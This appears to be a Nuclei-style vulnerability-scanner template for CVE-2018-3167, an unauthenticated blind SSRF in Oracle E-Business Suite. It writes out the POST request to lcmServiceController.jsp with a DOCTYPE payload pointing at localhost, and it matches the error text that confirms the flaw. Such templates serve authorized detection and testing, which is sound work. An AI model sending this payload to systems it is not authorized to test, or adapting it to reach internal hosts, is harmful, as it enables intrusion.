25 lines
583 B
YAML
25 lines
583 B
YAML
id: CVE-2018-3167
|
|
|
|
info:
|
|
name: Unauthenticated Blind SSRF in Oracle EBS
|
|
author: geeknik
|
|
severity: low
|
|
description: https://medium.com/@x41x41x41/unauthenticated-ssrf-in-oracle-ebs-765bd789a145
|
|
tags: cve,cve2018,oracle,ebs,ssrf
|
|
|
|
requests:
|
|
- method: POST
|
|
path:
|
|
- '{{BaseURL}}/OA_HTML/lcmServiceController.jsp'
|
|
|
|
body: <!DOCTYPE root PUBLIC "-//B/A/EN" "http://localhost:80">
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- 'Unexpected text in DTD'
|
|
part: body
|
|
- type: status
|
|
status:
|
|
- 200 |